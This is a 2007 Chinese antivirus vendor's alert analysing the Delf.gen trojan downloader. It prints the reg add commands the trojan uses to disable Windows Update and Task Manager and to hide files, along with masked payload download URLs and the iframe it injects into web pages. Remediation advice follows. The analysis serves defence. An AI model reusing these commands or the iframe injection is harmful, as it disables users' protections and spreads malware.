不支持Flash
|
|
|
安全警报:Trojan-Downloader.Win32.Delf.genhttp://www.sina.com.cn 2007年11月23日 17:10 太平洋电脑网
作者:超级巡警
超级巡警团队监测到恶意程序Trojan-Downloader.Win32.Delf.gen变种发布速度很快,并且针对大多数反病毒软件进行了相应的处理,以逃避被查杀。该程序不仅会在网页文件中插入恶意框架代码,通过多种系统或应用程序漏洞传播木马,还会释放利用系统自动运行功能的autorun.inf文件及相应文件。 一、病毒相关分析: 病毒标签: 病毒名称:Trojan-Downloader.Win32.Delf.gen 病毒类型:木马下载者 危害级别:3 感染平台:Windows 病毒大小:34,424(字节) SHA1 :0801dacd6a579ec5f0ed5d97e7f336b59ea2fbb9 加壳类型:未知 开发工具:Delphi 病毒行为: 1、程序运行后,释放文件: %System%\Systom.exe %System%\auToRun.inf 并在磁盘各个分区释放文件sos.exe和auToRun.inf 2、执行以下命令,修改注册表: reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WindowsUpdate" /v DisableWindowsUpdateAccess /t REG_dword /d 00000001 /f //禁用系统自动升级 reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_dword /d 00000001 /f //禁用任务管理器 reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\EXPlorer\Advanced" /v Hidden /t reg_dWord /d 00000000 /f //隐藏文件 reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v HideFileExt /t reg_dword /d 00000001 /f //隐藏扩展名 reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced" /v ShowSuperHidden /t reg_dword /d 00000000 /f //隐藏文件 reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL" /v CheckedValue /t REG_SZ /d 0 /f //隐藏文件 reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN" /v CheckedValue /t REG_dword /d 00000002 /f //隐藏文件 3、下载文件: http://*****/1.txt http://*****/2.txt http://*****/3.txt 其中1.txt内容为: http://*****/mh.exe http://*****/ok.exe http://*****/Server.exe http://*****/uc.exe http://*****/t/servere.exe 下载以上文件并重命名为?svchs0t.exe复制到系统目录%System%下 //?为从0开始数字 其中2.txt内容为: 360安全卫士 卡巴 瑞星 麦咖啡 NOD32 木马 防火墙 专杀工具 4、监控并关闭含有“病毒、木马、检测、wpe”等字符的窗体 5、在磁盘中所有网页文件尾部插入框架代码链接网马地址: <IfrAmE src=http://*****/index.htm width=50 height=0></IfrAmE> index.htm文件内容与网马利用漏洞如下图: 二、解决方案 推荐方案: 1、安装超级巡警进行全面病毒查杀。超级巡警用户请升级到最新病毒库,并进行全盘扫描。 2、升级系统及应用程序到最新版本。 3、选择超级巡警“工具”中“智能扫描”功能中的“清除指定代码”,进行全盘扫描并清除插入网页文件中的框架 代码。 超级巡警下载地址:http://www.dswlab.com/d1.html 三、安全建议 1、立即安装或更新防病毒软件并对内存和硬盘全面扫描(推荐安装超级巡警)。 2、根据实际安全级别需要适当考虑选用防火墙,并进行正确的设置。 3、使用超级巡警的补丁检查功能,及时安装系统补丁。 4、禁用或删除不必要的的帐号,对管理员帐号设置一个强壮的密码。 5、禁用不必要的服务。 6、及时更新常用软件,尤其是聊天工具。 7、不要随意下载不安全网站的文件并运行。 8、下载和新拷贝的文件要首先进行查毒。 9、不要轻易打开即时通讯工具中发来的链接或可执行文件。 10、使用移动存储介质进行数据访问时,先对其进行病毒检查,建议使用超级巡警U盘免疫器进行免疫。 注: %System% 是一个可变路径,在windows95/98/me中该变量是指%Windir%\System,在WindowsNT/2000/XP/2003/VISTA中该变 量指%Windir%\System32。其它: %SystemDrive% 系统安装的磁盘分区 %SystemRoot% = %Windir% WINDODWS系统目录 %ProgramFiles% 应用程序默认安装目录 %AppData% 应用程序数据目录 %CommonProgramFiles% 公用文件目录 %HomePath% 当前活动用户目录 %Temp% =%Tmp% 当前活动用户临时目录 %DriveLetter% 逻辑驱动器分区 %HomeDrive% 当前用户系统所在分区 不支持Flash
|